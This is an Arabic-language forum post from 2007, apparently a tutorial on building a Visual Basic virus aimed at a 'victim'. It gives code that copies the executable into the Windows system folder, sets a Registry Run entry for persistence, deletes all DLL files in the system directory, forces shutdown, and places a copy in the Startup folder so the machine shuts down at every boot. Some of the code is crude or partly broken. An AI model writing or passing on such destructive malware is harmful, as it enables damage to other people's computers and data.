02-22-2007, 02:16 PM
|
#1 (permalink)
|
| السلام عليكم ورحمة اله وبركاته
هنا بعض الطرق التي اعرفها والتي ستساعدك على عمل فايروس في vb
لنبدأ: اولا يجب ان تعرف كيف تعمل نسخة للفيروس فمثلا عندما الضحية يحمل الفيروس ويشغلة سيقوم البرنامج بنسخ نسخة اخرى في السيستم او اي مكان اخر, هكذا:
[hide]
code:
--------------------------------------------------------------------------------
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\windows\system\Project12.exe"
FileCopy copy, copy2
--------------------------------------------------------------------------------
الان ايضا نحتاج لكي يعمل الفيروس دائما عند تشغيل الكمبيوتر وذلك عن طريق ال registry :
code:
--------------------------------------------------------------------------------
Option Explicit
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Sub Command1_Click()
Dim InputValue As String
Dim nBufferKey As Long, nBufferSubKey As Long
RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
InputValue = "c:\windows\system\Project12.exe"
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)
End Sub
--------------------------------------------------------------------------------
الان لنبدأ بصنع الفيروس
ضع هذا في form_load
هذا الكود خطير ويقوم يحذف جميع ملفات dll الموجودة في system
code:
--------------------------------------------------------------------------------
Call Kill ("C:\WINDOWS\SYSTEM\ *.dll")
Call Shell("Rundll32.exe user,exitwindows")
--------------------------------------------------------------------------------
هذا الكود يقوم بأغلاق الجهاز كلما فتحتة
code:
--------------------------------------------------------------------------------
Name App.Path & "\Virus3.exe" As "C:\WINDOWS\Start Menu\Programs\StartUp\Virus3.exe"
Call Shell("Rundll32.exe user,exitwindows")
--------------------------------------------------------------------------------
لاتنسى تغيير virus3.exe الى الفيروس الذي صنعتة
[/hide] |
| |